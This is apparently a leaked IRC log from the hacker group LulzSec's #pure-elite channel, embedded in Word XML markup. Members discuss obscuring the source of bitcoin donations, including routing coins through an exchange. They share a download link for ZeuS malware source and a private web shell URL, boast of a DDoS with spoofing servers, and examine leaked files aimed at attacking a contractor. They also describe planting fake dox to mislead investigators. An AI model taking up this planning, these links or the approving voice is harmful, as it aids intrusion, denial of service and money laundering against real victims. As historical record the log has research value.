        <w:t>Jun 04 11:12:41 joepie91 well derp Jun 04 11:12:42 joepie91 idk Jun 04 11:13:04 Topiary okay well get him to donate to you, then you send to tflow, then tflow send to the lulzsec address Jun 04 11:13:04 tflow i can make one on the bitcoin client if you want Jun 04 11:13:08 tflow ok Jun 04 11:13:20 tflow but if i send to lulzsec address Jun 04 11:13:26 tflow it will be traced back to him Jun 04 11:13:33 joepie91 don't send to lulzsec address Jun 04 11:13:36 joepie91 keep it apart Jun 04 11:13:54 Topiary okay sure then Jun 04 11:13:58 Topiary whatever he wants Jun 04 11:14:06 Topiary if it's 0.01 I will raeg Jun 04 11:14:36 joepie91 lol Jun 04 11:14:44 joepie91 I don't think it will be 0.01 :P Jun 04 11:14:56 tflow 1F7Y5uktm2DofQfMBLfL6cg2TWDmuTkZKU Jun 04 11:16:12 joepie91 okay Jun 04 11:16:14 joepie91 1 sec Jun 04 11:16:27 joepie91 I will probably leave a delay in sending it Jun 04 11:16:32 joepie91 so that he can send it to the anonnews address Jun 04 11:16:41 joepie91 and 1 or 2 days later I can forward it plus a little bit extra to that address Jun 04 11:16:48 joepie91 so that it looks as if I just wanted to "share the wealth" Jun 04 11:16:49 joepie91 etc etc Jun 04 11:17:09 tflow or why not send directly?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:17:21 Topiary if you're gonna wait 1-2 days, might as well send directly to lulzsec Jun 04 11:17:30 joepie91 because he doesn't want to be openly linked with lulzsec Jun 04 11:17:40 tflow but it's a new address Jun 04 11:17:56 joepie91 yes, but that will only work if you keep it completely separate Jun 04 11:18:04 tflow we will Jun 04 11:18:07 Topiary we do that anyway Jun 04 11:18:10 joepie91 so don't forward the btc from your address to the lulzsec address Jun 04 11:18:14 joepie91 don't combine payments Jun 04 11:18:14 joepie91 etc Jun 04 11:18:15 tflow ok Jun 04 11:18:15 Topiary whenever we buy anything, I transfer from the main hash to side-hashes Jun 04 11:18:43 tflow that can still be traced Jun 04 11:18:53 joepie91 goddamn Jun 04 11:18:53 joepie91 1 sec Jun 04 11:21:08 joepie91 mk Jun 04 11:21:11 joepie91 now someone else Jun 04 11:21:17 joepie91 is merging into the conversation Jun 04 11:21:22 joepie91 discouraging him from donating etc etc Jun 04 11:21:24 joepie91 wtf -_- Jun 04 11:21:28 tflow lol Jun 04 11:21:32 tflow where is this happenning?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:21:37 tflow happening* Jun 04 11:21:42 joepie91 an irc channel Jun 04 11:22:11 tflow just becareful not to link yourself to lulzsec Jun 04 11:23:19 Topiary tell him to grow some balls and donate to the main hash like everyone else Jun 04 11:23:27 Topiary and then tell him to get a new address on his end Jun 04 11:23:32 Topiary and donate the rest to that one Jun 04 11:24:02 joepie91 no srsly, he can't just directly donate it Jun 04 11:24:13 Topiary why not?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 11:24:15 tflow a good way to seperate bc addresses it to convert it to mt gox, then convert it backto bc Jun 04 11:24:20 joepie91 pm Jun 04 11:34:49 storm ho Jun 04 11:34:51 storm hi Jun 04 11:35:01 * storm gives channel operator status to lol Topiary Jun 04 12:00:51 joepie91 - - jews.irc.lulzco.org Message of the Day - Jun 04 12:00:51 joepie91 - Welcome to irc.encyclopediadramatica.ch Jun 04 12:00:51 joepie91 eh.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:07:32 Topiary joepie91 how is that thing going?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:07:55 joepie91 idk Jun 04 12:07:59 joepie91 haven't gotten a response anymore :/ Jun 04 12:08:07 joepie91 I'll wait for a bit until he responds Jun 04 12:11:29 joepie91 goddamnit Jun 04 12:11:33 joepie91 &gt;read inbox Jun 04 12:11:35 joepie91 &gt;spamspamspamspamspam Jun 04 12:14:37 * neuron (neuron@HA-a12.345.a84vd3.IP) has joined #pure- elite Jun 04 12:14:47 neuron o/ morning everyone Jun 04 12:14:54 lol hi neuron :D Jun 04 12:15:07 neuron whats everyone up to/ Jun 04 12:17:22 neuron whats this irc on twitter?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:19:40 * joepie91 facepalms Jun 04 12:19:41 joepie91 http://www.foxbusiness.com/on- air/stossel/blog/2011/06/02/digital-currency-libertarian-future-0 Jun 04 12:19:44 joepie91 &gt;bitcoin Jun 04 12:19:47 joepie91 &gt;libertarian Jun 04 12:19:56 joepie91 &gt;assigning a political color to everything "different" that occurs Jun 04 12:20:03 joepie91 neuron: it's the ED IRC I believe Jun 04 12:20:38 neuron ED?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:22:13 neuron lol: you there?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:24:18 sabu sex Jun 04 12:24:26 sabu joepie Jun 04 12:24:28 neuron hey Sabu o/ Jun 04 12:24:35 Topiary Account Balance is: 26.100001 BTC (449.44 USD @ 17.22) Jun 04 12:24:38 Topiary FFFFFUUUU someone sent us 0.000001 Jun 04 12:24:41 sabu it was the ed irc, hes changing whole network to lulzco net Jun 04 12:24:45 sabu hahahahhah ytou serious?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:24:51 sabu thats awesome Jun 04 12:24:55 lol xD Jun 04 12:25:05 lol neuron: yeh :D?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:06 sabu wait what the FUCK bitcoins are at 17 dollars?????????????????????????</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:13 neuron AWW YEAH Jun 04 12:25:14 Topiary yeah we have 450USD LOL Jun 04 12:25:15 Topiary in donations Jun 04 12:25:16 neuron they keep going up Jun 04 12:25:20 sabu topiary are we going to start buying servers?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:20 lol yeh they're going up all the time :D Jun 04 12:25:21 sabu and vpns?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:25:25 sabu or are we gonna sit on it Jun 04 12:25:29 neuron i say buy now Jun 04 12:25:35 neuron its gonna go down soon Jun 04 12:25:42 Topiary joepie says it's gonna go up soon Jun 04 12:25:47 Topiary like at least to 20 Jun 04 12:25:50 neuron :E Jun 04 12:25:53 sabu topiary generate me a new donation key so I put on topic of lulzsec chan on lulzco network Jun 04 12:26:05 Topiary let's just use the same one bro Jun 04 12:26:26 sabu im lazy lo Jun 04 12:26:27 * neuron will be in that lulzco channel has BlackBeard Jun 04 12:26:28 sabu which one is it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:26:30 Topiary sec Jun 04 12:26:33 sabu neuron Jun 04 12:26:38 sabu remember what happened with 2600 Jun 04 12:26:46 neuron I didn't have aproblem in 2600 Jun 04 12:26:47 sabu you got to be on point if I op you Jun 04 12:26:48 Topiary http://lulzsecurity.com/donate/ Jun 04 12:26:52 Topiary just put this in the topic Jun 04 12:26:54 Topiary &lt;3 Jun 04 12:26:57 neuron I will be Jun 04 12:27:04 Topiary Sabu: want me to head over?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:29:52 neuron Sabu: Ill be careful Jun 04 12:31:38 joepie91 it's best to sit on bitcoins as long as possible Jun 04 12:31:39 joepie91 imo Jun 04 12:31:48 joepie91 they are pretty much guaranteed to go further up Jun 04 12:31:51 joepie91 in the future Jun 04 12:31:53 lol untill they hatch! :) Jun 04 12:32:06 joepie91 it's pretty much a deflationary currency, not inflationary Jun 04 12:32:29 joepie91 butbutbut Jun 04 12:32:31 joepie91 gotta go somewhere Jun 04 12:32:33 joepie91 for a sec Jun 04 12:33:04 sabu guys Jun 04 12:33:13 sabu if you head over we have much more ocntrol than on 2600 Jun 04 12:33:18 sabu so use your pseudonyms Jun 04 12:33:29 sabu and lol @ faggotry on here Jun 04 12:33:40 sabu register your nicks and tell me them Jun 04 12:33:49 tflow bottle_of_rum Jun 04 12:33:59 neuron Registeered BlackBeard Jun 04 12:37:14 joepie91 Sabu: isn't it Ryans IRC...?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:39:18 sabu 08:37 &lt;lulzsupport&gt; dude check this :) http://www.megaupload.com/?d=0H302G70 Jun 04 12:39:19 sabu 08:37 &lt;lulzsupport&gt; but do not spread use for your purposes ;) Jun 04 12:39:24 sabu check whats about?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:39:37 neuron mn ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:39:49 sabu 08:38 &lt;lulzsupport&gt; [was to give it to captainjack yesterday but i lost him so i didn't have the time to give him the stuff]:) Jun 04 12:39:52 sabu 08:38 &lt;lulzsupport&gt; nope friend but wanna help ;) Jun 04 12:39:53 sabu on your vm Jun 04 12:39:55 sabu 08:38 &lt;lulzsupport&gt; check and you say me :) Jun 04 12:39:56 sabu download that megaupoad Jun 04 12:39:59 sabu 08:38 &lt;lulzsupport&gt; [the directory issue] its for mantech.com :) Jun 04 12:40:01 sabu neuron Jun 04 12:40:02 neuron Rgr Jun 04 12:40:04 sabu see wtf is in it Jun 04 12:40:42 lol becarefull, if it's pdf's or things like tht Jun 04 12:40:52 lol open it on a virtual machine Jun 04 12:41:00 neuron Yeah Jun 04 12:41:11 lol incase it exploits your pdf viwer or w/e filetype it is Jun 04 12:41:35 sabu yeah Jun 04 12:41:38 sabu neuron be on point Jun 04 12:41:47 sabu make sure your vm is behind vpn etc Jun 04 12:41:50 sabu so your ip isnt exposed Jun 04 12:43:48 lol Dont mention nothing private in PM either Jun 04 12:43:52 lol to no one Jun 04 12:43:56 lol not even our members Jun 04 12:43:56 sabu guys Jun 04 12:43:58 sabu everyone Jun 04 12:44:00 sabu talk here Jun 04 12:44:01 lol just incase PM's are logged Jun 04 12:44:04 sabu yup Jun 04 12:44:08 joepie91 is it Ryans IRC or not?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:44:10 sabu I'm there already established Jun 04 12:44:16 sabu JOEPIE YES IT IS ED IRC NETWORK Jun 04 12:44:21 sabu HE CHANGED IT TO LULZCO NETWORK Jun 04 12:44:24 neuron XD Jun 04 12:44:26 joepie91 ah Jun 04 12:44:27 joepie91 there Jun 04 12:44:29 sabu ok Jun 04 12:44:30 neuron Sabu: im there just waiting for ops Jun 04 12:44:30 joepie91 that was what I was wondering about.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:44:31 joepie91 lol Jun 04 12:44:34 sabu lol Jun 04 12:44:35 sabu ok Jun 04 12:44:38 sabu before I start opping etc Jun 04 12:44:38 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pure- elite Jun 04 12:44:42 sabu make sure you guys are on point Jun 04 12:44:44 neuron o/ pwnsauce Jun 04 12:44:44 lol pwnsauce :D Jun 04 12:44:48 sabu if you get any docs / links in pm Jun 04 12:44:50 sabu paste here Jun 04 12:44:55 sabu we'll anallyze together Jun 04 12:44:58 pwnsauce Yo Jun 04 12:45:00 sabu no answering questions at all Jun 04 12:45:03 pwnsauce whats happening?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:45:05 sabu no drama dont get trolled Jun 04 12:45:06 sabu pwnsauce nothing Jun 04 12:45:07 sabu just bored Jun 04 12:45:08 sabu you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:45:13 pwnsauce Just got online Jun 04 12:45:16 pwnsauce got some idead Jun 04 12:45:19 pwnsauce *ideas Jun 04 12:45:33 joepie91 if someone feels like trolling Awinee some more, here is an excellent opportunity Jun 04 12:45:34 joepie91 &lt;awinee&gt;asie, I wouldn't wanna hack CP sites. Jun 04 12:45:34 joepie91 &lt;awinee&gt;just ddos them Jun 04 12:45:34 joepie91 &lt;asie&gt;Awinee why not?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:45:34 joepie91 &lt;awinee&gt;hacking them would involve possibly seeing the pictures Jun 04 12:45:52 neuron lol Jun 04 12:46:04 pwnsauce lol Jun 04 12:46:12 sabu HAHA Jun 04 12:46:17 joepie91 you know what they say about extreme denial.. .:D Jun 04 12:46:22 sabu ok who is on here now ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 12:46:28 sabu the lulzco server Jun 04 12:47:09 neuron o/ Has BlackBeard Jun 04 12:50:32 * trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #pure-elite Jun 04 12:50:59 * tflow_ (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure- elite Jun 04 12:52:25 * tflow has quit (Ping timeout: 121 seconds) Jun 04 12:52:32 * tflow_ is now known as tflow Jun 04 12:55:08 neuron lol: Lets see there is a pdf,ppt,xls..hhaha Jun 04 12:58:17 neuron Sabu.. im not seeing anything really "whoop" in this Jun 04 12:58:26 sabu ok Jun 04 12:58:59 neuron :( im the only opless guy in there *crys* Jun 04 13:03:32 trollpoll ill be back Jun 04 13:03:35 * trollpoll has quit (Quit: Leaving) Jun 04 13:03:45 pwnsauce trollpoll is... THE TERMINATOR!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:04:14 neuron Sabu: None of this can help us. This was supposed to be information to help us take down mantech but Jun 04 13:04:17 Topiary neuron, we're trying to hide our numbers and shit, we don't want more people being d0x'd Jun 04 13:04:28 Topiary on the other chan Jun 04 13:04:30 neuron Topiary: Understandable Jun 04 13:04:46 Topiary see the nicks that are OP'd now are assuming fake personas Jun 04 13:04:50 Topiary because we leaked fake dox Jun 04 13:05:02 Topiary we're diverting attention from our real nicks and Anonymous Jun 04 13:06:59 neuron Sabu: that zip contains a useless ad dump, email address *maybe useful*, A random nasa forcasting ppt from 2009, and a DoD biometric ppt Jun 04 13:07:45 sabu ok Jun 04 13:07:49 sabu thanks neuron Jun 04 13:07:51 sabu good work brother Jun 04 13:07:54 sabu fuck i gotta shit so hard Jun 04 13:07:55 sabu brb Jun 04 13:08:18 neuron Thats sexy Jun 04 13:12:27 pwnsauce ZeuS source code for all!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.mediafire.com/?o5v9ezj7lyme85t Jun 04 13:12:32 pwnsauce (sharing) Jun 04 13:13:58 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 13:15:10 * Topiary has quit (Quit: Leaving) Jun 04 13:16:59 neuron Wow people are really throwing bitcoin to lulzsec XD Jun 04 13:18:28 pwnsauce how many we got?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:18:29 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 04 13:18:32 sabu guys Jun 04 13:18:35 sabu http://www.youtube.com/watch?v=a23T8rl1sek Jun 04 13:18:36 neuron 26 Jun 04 13:18:39 sabu these guys just contacted me privately Jun 04 13:18:43 pwnsauce aye?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:18:52 sabu they disrupt national nazi parties Jun 04 13:18:57 sabu ook at how they fight the ns88 Jun 04 13:19:18 tflow what did they say?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:19:55 tflow lolwow Jun 04 13:20:34 sabu dude Jun 04 13:20:38 sabu they straight up fuck them nazis up hahaha Jun 04 13:23:02 neuron lol fuck Jun 04 13:34:53 storm rofl Jun 04 13:38:30 neuron thats pretyt crazy Jun 04 13:38:31 neuron o/ storm Jun 04 13:39:35 pwnsauce storm :D Jun 04 13:40:44 storm yooo Jun 04 13:40:59 storm sup neuron pwnsauce Jun 04 13:41:39 pwnsauce sup :D Jun 04 13:41:43 pwnsauce storm - rootkits?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:44:13 neuron brb Jun 04 13:44:14 storm you never got it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:44:19 storm I gave it to neuron Jun 04 13:45:17 storm lmk where you want it uploaded Jun 04 13:45:28 storm I'd prefer a shell with scp though.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:45:30 storm :P Jun 04 13:51:32 pwnsauce storm - use whoami.cer33.com/fun/shell.php Jun 04 13:51:37 pwnsauce its the web interface Jun 04 13:51:46 pwnsauce all it good for is uploading/downloading shit Jun 04 13:51:49 sabu https://pastee.org/zj3mm "not done" is the pssword Jun 04 13:51:53 sabu tell me what you guys think Jun 04 13:51:53 pwnsauce ill wget it later :) Jun 04 13:51:56 sabu reviving antisec Jun 04 13:52:17 pwnsauce Savu Jun 04 13:52:20 pwnsauce *Sabu Jun 04 13:52:24 pwnsauce u dun goofed Jun 04 13:52:27 pwnsauce no password needed Jun 04 13:52:28 pwnsauce :/ Jun 04 13:53:25 pwnsauce or maybe im just that 1337 that it didnt ask for one...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 13:54:03 storm lol Jun 04 13:54:05 storm yeah Jun 04 13:54:06 storm no pass Jun 04 13:54:33 storm pwnsauce: i don't haz a vpn to go to such webshells Jun 04 13:54:37 storm :x Jun 04 13:54:48 sabu oh its ok not public dont think Jun 04 13:54:55 sabu storm I can give oyu one fgt Jun 04 13:55:12 pwnsauce storm - thats my priv8 webll she Jun 04 13:55:17 pwnsauce *priv8 shell Jun 04 13:55:18 pwnsauce as in Jun 04 13:55:20 pwnsauce I control it Jun 04 13:55:27 storm oh i see Jun 04 13:58:15 storm rofl Jun 04 13:58:19 storm im dropping an efnet server Jun 04 13:58:21 storm with ease Jun 04 13:58:26 storm fucking funny Jun 04 13:58:32 storm 4 100mbps spoofers Jun 04 13:58:39 storm bitch is getting tore the fuck up Jun 04 13:59:04 pwnsauce hahahahhaaha Jun 04 13:59:17 storm pwnsauce: 1 sec Jun 04 14:00:35 storm k check pm Jun 04 14:18:34 storm who the fk is leon Jun 04 14:19:32 sabu ITS ME Jun 04 14:19:32 sabu DICK Jun 04 14:19:35 storm lol Jun 04 14:19:36 storm op me Jun 04 14:19:37 storm :D Jun 04 14:21:27 sabu what nick?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:21:39 storm voodoo ofc Jun 04 14:23:42 storm looks like bots are joining Jun 04 14:24:37 * trollpoll (trollpoll@HA-4pn.f1d.en4ulv.IP) has joined #pure-elite Jun 04 14:25:27 sabu storm Jun 04 14:25:28 neuron back Jun 04 14:25:30 sabu hande dem bots Jun 04 14:25:30 storm yo Jun 04 14:25:32 storm k Jun 04 14:25:34 sabu gave you ops Jun 04 14:26:03 neuron back o/ Jun 04 14:27:02 sabu sup Jun 04 14:27:05 sabu hi trollpol :D Jun 04 14:27:17 trollpoll hi bro Jun 04 14:27:27 trollpoll ill be here but idle..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:27:56 neuron Sabu: whats going on latley?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:28:32 sabu ok troll &lt;3 Jun 04 14:28:35 sabu neuron everythings ok Jun 04 14:28:59 neuron lulzcov = our disinformation campaign?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:29:54 sabu what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:29:57 sabu lulzcov?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 04 14:30:03 neuron the other server Jun 04 14:30:29 neuron someone ddos this guy Jun 04 14:30:39 storm i dunno what ips hes using Jun 04 14:30:49 * io (egfaby@HA-umf.f9m.2dndkn.IP) has joined #pure-elite Jun 04 14:30:54 neuron o/ io Jun 04 14:31:00 &lt;io&gt; heya fellow swashbucklers Jun 04 14:31:10 neuron hi io don't think we have ever meet Jun 04 14:32:27 pwnsauce io is an old "one of us" :D Jun 04 14:32:33 &lt;io&gt; maybe not, maybe we did. doesnt matter :) Jun 04 14:32:43 &lt;io&gt; sec brb Jun 04 14:32:44 neuron OOOO Jun 04 14:34:03 storm lol joepie91 Jun 04 14:34:10 storm always on your realname Jun 04 14:34:15 joepie91 don't op me kthx Jun 04 14:34:16 joepie91 ye Jun 04 14:34:16 joepie91 I know Jun 04 14:34:24 storm I'm not opping anyone Jun 04 14:34:25 storm ;p Jun 04 14:34:26 joepie91 I've been lurking on there from anonnews vps since forever Jun 04 14:34:38 joepie91 just decided to join there from normal client as well Jun 04 14:34:56 joepie91 I was joining from the anonnews vps to avoid Ryan ddosing me in a triggerhappy mood Jun 04 14:35:00 joepie91 and indeed Jun 04 14:35:02 joepie91 a few hours later Jun 04 14:35:08 joepie91 "you clever bastard, you know I can't ddos that IP" Jun 04 14:35:15 joepie91 (from Ryan in PM) Jun 04 14:35:50 joepie91 buuuut I don't think Ryan is as triggerhappy right now Jun 04 14:35:51 joepie91 so meh Jun 04 14:36:04 storm | WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network) Jun 04 14:36:04 storm ircname : The Prez Jun 04 14:36:04 storm | channels : #lulzsec +##lulzsec Jun 04 14:36:05 storm ROFL Jun 04 14:36:09 storm ##lulzsec Jun 04 14:36:12 neuron lol Jun 04 14:37:00 joepie91 Sabu Jun 04 14:37:06 joepie91 you mentioned an antifa group?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
